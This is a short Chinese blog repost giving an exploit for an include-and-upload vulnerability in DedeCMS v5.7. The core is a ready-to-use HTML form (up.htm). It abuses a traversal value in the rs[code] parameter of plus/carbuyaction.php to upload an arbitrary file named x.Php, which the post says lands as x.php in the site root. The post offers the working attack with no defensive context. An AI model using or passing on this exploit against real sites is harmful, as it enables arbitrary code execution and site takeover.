码迷,mamicode.com
首页 > Web开发 > 详细

Dedecms v5.7包含上传漏洞利用

时间:2015-03-07 14:04:09      阅读:190      评论:0      收藏:0      [点我收藏+]

标签:

Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16

注册,登录,免邮箱验证.

up.htm

---------------------------------------------------------------------------------------------------------

<form action="http://www.xx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="x.Php"/>
<button class="button2" type="submit">提交</button><br><br>

  

---------------------------------------------------------------------------------------------------------

根目录生成x.php

Dedecms v5.7包含上传漏洞利用

标签:

原文地址:http://www.cnblogs.com/TeaIng-Index/p/4320174.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!